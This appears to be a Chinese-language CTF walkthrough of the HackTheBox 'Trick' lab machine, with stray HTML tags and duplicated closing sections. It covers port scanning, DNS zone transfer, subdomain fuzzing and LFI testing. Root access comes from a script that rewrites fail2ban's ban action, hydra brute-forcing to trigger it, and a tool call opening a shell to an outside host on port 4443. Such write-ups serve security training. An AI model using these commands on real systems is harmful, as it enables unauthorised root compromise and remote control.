Trick 靶机渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>

使用Nmap和Masscan进行初始扫描：<\/p>

ip=<\/span>'10.10.11.166'<\/span>; itf=<\/span>'tun0'<\/span>;
<\/span><\/span>if<\/span> nmap -Pn -sn "<\/span>$ip"<\/span> | grep -q "Host is up"<\/span>; then<\/span>
<\/span><\/span>  echo -e "\e[32m[+] Target <\/span>$ip is up, scanning ports...\e[0m"<\/span>;
<\/span><\/span>  ports=<\/span>$(<\/span>sudo masscan -p1-65535,U:1-65535 "<\/span>$ip"<\/span> --rate=<\/span>1000<\/span> -e "<\/span>$itf"<\/span> | awk '\/open\/ {print $4}'<\/span> | cut -d '\/'<\/span> -f1 | sort -n | tr '\n'<\/span> ','<\/span> | sed 's\/,$\/\/'<\/span>)<\/span>;
<\/span><\/span>  if<\/span> [<\/span> -n "<\/span>$ports"<\/span> ]<\/span>; then<\/span>
<\/span><\/span>    echo -e "\e[34m[+] Open ports found on <\/span>$ip: <\/span>$ports\e[0m"<\/span>;
<\/span><\/span>    nmap -Pn -sV -sC -p "<\/span>$ports"<\/span> "<\/span>$ip"<\/span>;
<\/span><\/span>  else<\/span>
<\/span><\/span>    echo -e "\e[31m[!] No open ports found on <\/span>$ip.\e[0m"<\/span>;
<\/span><\/span>  fi<\/span>;
<\/span><\/span>else<\/span>
<\/span><\/span>  echo -e "\e[31m[!] Target <\/span>$ip is unreachable, network is down.\e[0m"<\/span>;
<\/span><\/span>fi<\/span>
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

22\/tcp: OpenSSH 7.9p1 Debian 10+deb10u2<\/li>
25\/tcp: Postfix smtpd<\/li>
53\/tcp: ISC BIND 9.11.5-P4-5.1+deb10u7 (DNS)<\/li>
80\/tcp: nginx 1.14.2<\/li>
<\/ul>
1.2 DNS反向查询<\/h3>
dig @10.10.11.166 -x 10.10.11.166
<\/span><\/span>echo '10.10.11.166 trick.htb'<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>1.3 DNS区域传输<\/h3>
dig axfr @10.10.11.166 trick.htb
<\/span><\/span>echo '10.10.11.166 preprod-payroll.trick.htb'<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>2. Web应用渗透<\/h2>
2.1 子域名枚举<\/h3>
使用ffuf进行子域名爆破：<\/p>
ffuf -w \/usr\/share\/amass\/wordlists\/subdomains-top1mil-20000.txt -u http:\/\/trick.htb -H "Host:preprod-FUZZ.trick.htb"<\/span> -ac
<\/span><\/span><\/code><\/pre>发现preprod-marketing.trick.htb<\/code>后添加到hosts文件：<\/p>
echo '10.10.11.166 preprod-marketing.trick.htb'<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>2.2 参数发现<\/h3>
使用Arjun发现隐藏参数：<\/p>
arjun -u 'http:\/\/preprod-marketing.trick.htb'<\/span>
<\/span><\/span><\/code><\/pre>2.3 LFI漏洞利用<\/h3>
使用Pany工具进行本地文件包含测试：<\/p>
python3 pany.py -u 'http:\/\/preprod-marketing.trick.htb?page=*'<\/span>
<\/span><\/span><\/code><\/pre>成功利用后获取user flag：

10c468007a6adfbd703fcfb4f253bb91<\/code><\/p>
3. 权限提升<\/h2>
3.1 fail2ban配置分析<\/h3>
检查fail2ban配置：<\/p>
cd \/etc\/fail2ban\/action.d
<\/span><\/span>cat iptables-multiport.conf
<\/span><\/span><\/code><\/pre>发现当前用户属于security组，可以修改action.d目录下的文件。<\/p>
3.2 利用Tyrant进行持久化<\/h3>

下载Tyrant工具：<\/li>
<\/ol>
https:\/\/github.com\/MartinxMax\/Tyrant
<\/span><\/span><\/code><\/pre>
创建run.sh脚本：<\/li>
<\/ol>
#!\/bin\/bash
<\/span><\/span><\/span><\/span># run.sh<\/span>
<\/span><\/span>echo "Waiting for the file to exist..."<\/span>
<\/span><\/span>while<\/span> [[<\/span> ! -f \/etc\/fail2ban\/action.d\/iptables-multiport.conf ]]<\/span>; do<\/span>
<\/span><\/span>  sleep 0.1
<\/span><\/span>done<\/span>
<\/span><\/span>
<\/span><\/span>echo "Backing up the original file..."<\/span>
<\/span><\/span>mv \/etc\/fail2ban\/action.d\/iptables-multiport.conf \/etc\/fail2ban\/action.d\/iptables-multiport.conf.bak
<\/span><\/span>cp \/etc\/fail2ban\/action.d\/iptables-multiport.conf.bak \/etc\/fail2ban\/action.d\/iptables-multiport.conf
<\/span><\/span>
<\/span><\/span>echo "[+] Modifying the file..."<\/span>
<\/span><\/span>sed -i -e "s|actionban = .*|actionban = \/tmp\/tyrant|g"<\/span> \
<\/span><\/span><\/span><\/span>       -e "s|actionunban = .*|actionunban = \/tmp\/tyrant|g"<\/span> \
<\/span><\/span><\/span><\/span>       \/etc\/fail2ban\/action.d\/iptables-multiport.conf
<\/span><\/span>
<\/span><\/span>echo "[*] Changing file permissions..."<\/span>
<\/span><\/span>chmod 666<\/span> \/etc\/fail2ban\/action.d\/iptables-multiport.conf
<\/span><\/span>
<\/span><\/span>echo "[+] Restarting fail2ban service..."<\/span>
<\/span><\/span>sudo -u root \/etc\/init.d\/fail2ban restart
<\/span><\/span>
<\/span><\/span>if<\/span> [[<\/span> $? -ne 0<\/span> ]]<\/span>; then<\/span>
<\/span><\/span>  echo "[-] Fail2ban restart failed. Exiting."<\/span>
<\/span><\/span>  exit 1<\/span>
<\/span><\/span>fi<\/span>
<\/span><\/span>
<\/span><\/span>echo "[*] Monitoring \/tmp\/tyrant for SUID permission..."<\/span>
<\/span><\/span>while<\/span> true; do<\/span>
<\/span><\/span>  if<\/span> [[<\/span> -u \/tmp\/tyrant ]]<\/span>; then<\/span>
<\/span><\/span>    echo "[+] Successfully detected SUID on \/tmp\/tyrant. Exiting."<\/span>
<\/span><\/span>    exit 0<\/span>
<\/span><\/span>  fi<\/span>
<\/span><\/span>  sleep 0.5
<\/span><\/span>done<\/span>
<\/span><\/span><\/code><\/pre>
执行脚本：<\/li>
<\/ol>
.\/run.sh
<\/span><\/span><\/code><\/pre>
触发fail2ban规则：<\/li>
<\/ol>
hydra -l root -P \/home\/maptnh\/Desktop\/rockyou.txt 10.10.11.166 ssh -t 4<\/span> -vV
<\/span><\/span><\/code><\/pre>
利用Tyrant获取root权限：<\/li>
<\/ol>
\/tmp\/tyrant -uid 0<\/span> -rhost 10.10.16.33 -rport 4443<\/span>
<\/span><\/span><\/code><\/pre>成功获取root flag：

ce2824dc567a34aa0e509ddb8337782b<\/code><\/p>
4. 关键点总结<\/h2>

DNS区域传输<\/strong>：通过AXFR请求获取子域名信息<\/li>
子域名枚举<\/strong>：使用ffuf等工具爆破子域名<\/li>
LFI漏洞利用<\/strong>：通过Pany工具自动化测试本地文件包含<\/li>
fail2ban配置修改<\/strong>：利用security组权限修改action脚本<\/li>
Tyrant持久化<\/strong>：通过修改fail2ban的actionban指向恶意脚本获取root权限<\/li>
<\/ol>
5. 防御建议<\/h2>

限制DNS区域传输，仅允许授权服务器<\/li>
对子域名枚举实施速率限制<\/li>
对用户输入进行严格过滤，防止LFI漏洞<\/li>
限制对fail2ban配置文件的访问权限<\/li>
定期审计系统上的SUID\/SGID文件<\/li>
<\/ol>

Trick 靶机渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

2. Web应用渗透<\/h2>

5. 防御建议<\/h2> 限制DNS区域传输，仅允许授权服务器<\/li> 对子域名枚举实施速率限制<\/li> 对用户输入进行严格过滤，防止LFI漏洞<\/li> 限制对fail2ban配置文件的访问权限<\/li> 定期审计系统上的SUID\/SGID文件<\/li> <\/ol>

5. 防御建议<\/h2>

限制DNS区域传输，仅允许授权服务器<\/li>
对子域名枚举实施速率限制<\/li>
对用户输入进行严格过滤，防止LFI漏洞<\/li>
限制对fail2ban配置文件的访问权限<\/li>
定期审计系统上的SUID\/SGID文件<\/li> <\/ol>